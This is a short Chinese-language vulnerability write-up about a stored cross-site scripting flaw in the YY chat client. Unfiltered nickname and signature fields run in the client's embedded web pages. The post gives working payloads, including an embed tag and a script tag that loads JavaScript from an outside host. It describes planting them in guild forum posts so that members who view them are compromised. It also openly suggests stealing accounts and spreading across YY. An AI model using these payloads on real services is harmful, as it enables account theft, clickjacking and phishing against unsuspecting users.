和qq一样,yy的账户有昵称和签名。
qq客户端的和qq的web无缝连接,所以
">'>
这样的代码,在客户端里不会出现bug,但是直接出现在web就可以来xss了。详见:http://tmxk.org/thread-496-1-1.html。
yy犯了同样的错误。
yy的昵称为20字节不好构造,可行的代码,但已测试,没有过滤,极端情况下可以xss,如
<embed/src=//x.cn/x>,这样点击劫持、钓鱼足矣。
yy的签名则没有限制,直接上代码
<script/src=//tmxk.org/.js></script>
怎么让此处的代码出现在web里执行呢?
1.我们到频道里测试。
首先我断定yy的频道里嵌入了web,这种思路是通用的,很多客户端都是这样,并可以查看web源码。我们ctrl+A复制当前,打开一个在线编辑器,ctrl+C,在编辑器的源码模式就可以看到复制web的源码了。
通过这种方式我们可以知道签名的代码在web里是什么形态了。
2.我们先测试 论坛 ,发帖,发现论坛的编辑器是富文本的,不是textarea,这个就可以插入富文本代码,但是因为嵌入的web,我又不能抓包,我还是通过上面的方式,找到了论坛的web页面,发现,富文本会过滤的。这是论坛url,http://y.duowan测试数据/channel2/52399485/index
0x1.2我们把签名或昵称改成代码,重复同样操作。发现代码执行了。
这是对应的url,
http://y.duowan测试数据/channel2/getDetail?channelId=52399485&bbsZoneId=wEqixf--ONF&topicId=wEqiyVZ-OOB
这是在yy客户端里的执行情况
我猜想,这个简单的 浏览器 果断有和脚本交互的接口,我没有耐心去找了。
3.这个只要是公会会员就可发帖,该公会的人看到就会中招。
盗个紫马不是屌丝梦。
结合游戏、音乐等功能,可以横行yy矣。
查看更多关于YY客户端缺陷导致存储型XSS - 网站安全 - 自学ph的详细内容...